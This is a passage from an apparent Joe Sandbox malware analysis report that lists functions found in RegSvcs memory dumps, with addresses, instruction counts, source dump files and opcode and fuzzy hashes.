                                                • Instruction ID: 1a476e8ddd3e18ec3c04edfadf5cb50ccba8953fdd6eb39fdf7ea99a35c69a2f
                                                • Opcode Fuzzy Hash: ab1dc6f0c1ff70e8bc232f5fc0159fae274e6cecc98b394d5a1e0f90cba0250c
                                                • Instruction Fuzzy Hash: 3E21F271604344DFDF24DF18D9C0B16BB66EB88315F24C569EC4A4B296C33AD84BCA72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9A28 Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7827900f9974a2ddb2d1dff6f5fe1d9372b2dee3d3aa5c4c7db59ee715560eb
                                                • Instruction ID: eafdf2cc5d0dd69b9bbbfe68c0ced2007c040b076b20765d23b4c3427af50d37
                                                • Opcode Fuzzy Hash: a7827900f9974a2ddb2d1dff6f5fe1d9372b2dee3d3aa5c4c7db59ee715560eb
                                                • Instruction Fuzzy Hash: 4921A171B001159FEF14DBA9C864BAE7BF6FF88714F50806AE505EB3A5DAB1DC008B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9160 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4b9f3ef9d93997d455cd67b601d00696a8d58bedc52939d15388ffba0e6ecbe
                                                • Instruction ID: af9acd1fd832399a8fc149e4e43ec13713722a83b8342b40714c69612fb49900
                                                • Opcode Fuzzy Hash: a4b9f3ef9d93997d455cd67b601d00696a8d58bedc52939d15388ffba0e6ecbe
                                                • Instruction Fuzzy Hash: AD218034F002099BDB19CFA8D8545DEB7B2EF89304F50861AE855BB340EB71A945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1888 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a7fca0c84de99b273b31b03847da864ce8eace03e255d4978c94259aaf7a729
                                                • Instruction ID: 37cc61571bb77f5abb227b8d6363b70a95913c88f927f35efdac990fd9d85fab
                                                • Opcode Fuzzy Hash: 5a7fca0c84de99b273b31b03847da864ce8eace03e255d4978c94259aaf7a729
                                                • Instruction Fuzzy Hash: 77217C34B402058FEB64EBB8C5247AE77F6EF89241F5004A8D046EB3A4DF369D01CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A16B0 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 099f32d570e6f58ac328ac7acd517716d7ee5d380718154a71fdfac4acb9b5ca
                                                • Instruction ID: 9c93ae5651febd867c0c0e2ee3a65ddf48dc3b707899725911f406c9bbc596ca
                                                • Opcode Fuzzy Hash: 099f32d570e6f58ac328ac7acd517716d7ee5d380718154a71fdfac4acb9b5ca
                                                • Instruction Fuzzy Hash: A22193386141004FEF57EB68E884B6D37B9FB49344F508A65D047CB29AEB74D8528F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4F98 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 788e379e42608220aacb5f0ad5df461015a3a5f3655c2eb108efb9d20be2f376
                                                • Instruction ID: 7d079d005abb664bdff30a7df8431cd828a113107b3f5a73ecd7f59253456ae9
                                                • Opcode Fuzzy Hash: 788e379e42608220aacb5f0ad5df461015a3a5f3655c2eb108efb9d20be2f376
                                                • Instruction Fuzzy Hash: 3F2116347402058FDB54EBB8D958BAE77F1FB49204F5004A8F446EB3A8DB769D01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A0838 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e3c9674814b32aca1b1f6a8ab1cc44bc5bdd791d6f020eb7b52d952cb804383
                                                • Instruction ID: 96bf410dbf57478ab95dc589812f83fcef40d630024b098ca39920d19ad1ee53
                                                • Opcode Fuzzy Hash: 1e3c9674814b32aca1b1f6a8ab1cc44bc5bdd791d6f020eb7b52d952cb804383
                                                • Instruction Fuzzy Hash: EB11E730B012085BFF6756FCC9103793394EB85244F5089AAF4C2DB28BEA65D9824BDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A0848 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8a6b8d1900243b9bdcd1ab83f0a8eaba47945f1e6e90aaec7956e2d77e3f2b
                                                • Instruction ID: a218be90e7ee12c1c0a27fdcadff9fe6e7f98dbb9a1c115d85ff6225dda7097c
                                                • Opcode Fuzzy Hash: bd8a6b8d1900243b9bdcd1ab83f0a8eaba47945f1e6e90aaec7956e2d77e3f2b
                                                • Instruction Fuzzy Hash: 6711C830B0120C4FEF675ABCC4007393295EB85650F504979E0C2CF28AEA65DD828BD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00D5D005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2531405322.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_d5d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ebbe44f2879176ac9d21938657f3eb70e51ec5948f94f41c0c67484f878716f
                                                • Instruction ID: 2659d3a097d0b44a34ad6f3a779daf87c56285844fce49d4c7ee0539d119d931
                                                • Opcode Fuzzy Hash: 7ebbe44f2879176ac9d21938657f3eb70e51ec5948f94f41c0c67484f878716f
                                                • Instruction Fuzzy Hash: 81215E755093808FDB16CF24D994715BF72EB46314F28C5EADC498B6A7C33A980ACB72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A17C0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9b4264a13c14f6c9660fedbf9f8eb398bf6ec9e746193c4a9d0cb7e9af6d0cc
                                                • Instruction ID: d7711f200992e411350c79cabe04b1b12de5c011ac56ecc72df7f4586b31dcb5
                                                • Opcode Fuzzy Hash: c9b4264a13c14f6c9660fedbf9f8eb398bf6ec9e746193c4a9d0cb7e9af6d0cc
                                                • Instruction Fuzzy Hash: B3110679F403108FEF11ABB9A84426E7BF5FB88650F10086AD946D3340E730C812CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1498 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 730125094f879b6767b2cb78908188b8537aa6f9836cd83cbd20d2dbcaddb987
                                                • Instruction ID: 5209993e35c8530991a519f5a31294ff6cb11834d2fa9269e6cfe47bc82b6019
                                                • Opcode Fuzzy Hash: 730125094f879b6767b2cb78908188b8537aa6f9836cd83cbd20d2dbcaddb987
                                                • Instruction Fuzzy Hash: E8012131A002159BDF51EFFC84501DE7BE5EB48250F9404B9D445E7301EB35C9428B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9890 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ba66d8a2beffc9a376324f0a2f2412a0b463120a3389535e7d31a75d358047b
                                                • Instruction ID: 81db971163d97a47c81fc8d06604115cdcadc8d61f8e0ac20ed9fa738954bcff
                                                • Opcode Fuzzy Hash: 7ba66d8a2beffc9a376324f0a2f2412a0b463120a3389535e7d31a75d358047b
                                                • Instruction Fuzzy Hash: F201B930A102048FDB14DF99D88478ABBB5FF84310F54C164D84C5B25AEBB0D945CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A099B Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15bbdc782e8117d6a0257cccd4af8fca4b6156fc00c6736dad49867b850fedaf
                                                • Instruction ID: 3d6a9f8cc78d0154895d6244260d49cb9d4e6789dfd6775f6cbdaff3c63832b3
                                                • Opcode Fuzzy Hash: 15bbdc782e8117d6a0257cccd4af8fca4b6156fc00c6736dad49867b850fedaf
                                                • Instruction Fuzzy Hash: CFF0962190821E87FF7755EC45643392298DB51321FD04475F2CAC728EEB68CA55D3DB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A1524 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04aa2d633cc6280b21fc8c2c995dd4155239b901742cfee04ada6ed020862c5d
                                                • Instruction ID: 9f570d8a251149e1b53f5058ce5611abef626f7301d6b71ecc47ac1ab996b67f
                                                • Opcode Fuzzy Hash: 04aa2d633cc6280b21fc8c2c995dd4155239b901742cfee04ada6ed020862c5d
                                                • Instruction Fuzzy Hash: 9EF0F633A04110DFD7229BF884902EC7BA5EE59151B9D00D7D8C6EB201D736D442CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A7090 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed2a30101074becab9a122bf49cd6eb458944373d5c3ffd79a95fb242b63c55c
                                                • Instruction ID: 3e6f887b477563f31c60ba38564b3daa063a86c4c064d316a42e5e1c61ecb113
                                                • Opcode Fuzzy Hash: ed2a30101074becab9a122bf49cd6eb458944373d5c3ffd79a95fb242b63c55c
                                                • Instruction Fuzzy Hash: 7EF03C39B40118CFC714DB68D5A8B6C7BB2FF88315F1044A8E5068B3A0CB35AD02CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A80F1 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 881ef93ff713a76a4a1389d14e5a6ad6a90d23e877efd74abbc61194589ab186
                                                • Instruction ID: 0029e5cd739fa1d8eeb30e4ac68c3f0c3ff6067b2e808e8209d073bf45cf9f78
                                                • Opcode Fuzzy Hash: 881ef93ff713a76a4a1389d14e5a6ad6a90d23e877efd74abbc61194589ab186
                                                • Instruction Fuzzy Hash: 8201AD349502459FEF1AEFB8F890A9D3B76FF41300B0046B8C4426B1D5EF31AA42CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A8100 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30eba70de53e355186f35fd1c08a139ab6f6029478548790bdebb616d6163acd
                                                • Instruction ID: 12327f1f1eb3c89c20d249ac4393c1a7299d7d5a78e89ba74c4ade9f70770559
                                                • Opcode Fuzzy Hash: 30eba70de53e355186f35fd1c08a139ab6f6029478548790bdebb616d6163acd
                                                • Instruction Fuzzy Hash: B6F01934911208AFDF05EFB8F891A9D7BB6EB44300F508678C406AB294EB716A558F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A09DD Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6f5d9fe87f8f33378b882d05cce3515b2290ac7cc7da67e59c60d9bfa7ae3cf
                                                • Instruction ID: af63217d1e83aab0a1b3207ab918e37bb05a3ed03df075b6e3e1d7f9a8271c22
                                                • Opcode Fuzzy Hash: c6f5d9fe87f8f33378b882d05cce3515b2290ac7cc7da67e59c60d9bfa7ae3cf
                                                • Instruction Fuzzy Hash: 21E0DF216AD25E81EE2B40E818B03796A9C8F32324FC04479F3C8DB61FE154C2A4D226
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 05F71C5D Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58497338cf142d3bfce6fafe6df9afe6721a6df90aa821ec20ffe2cc808e25c
                                                • Instruction ID: 0859dcac896fa698e8521350d19a5178f9cf1d28dc13d19f3405c65d31ae132c
                                                • Opcode Fuzzy Hash: c58497338cf142d3bfce6fafe6df9afe6721a6df90aa821ec20ffe2cc808e25c
                                                • Instruction Fuzzy Hash: BCD0C20508C28D47931B12B85460F3D2B907C81124B4A44EBC8C05650EF00CC86ED2A3
                                                Uniqueness

                                                Uniqueness Score: -1.00%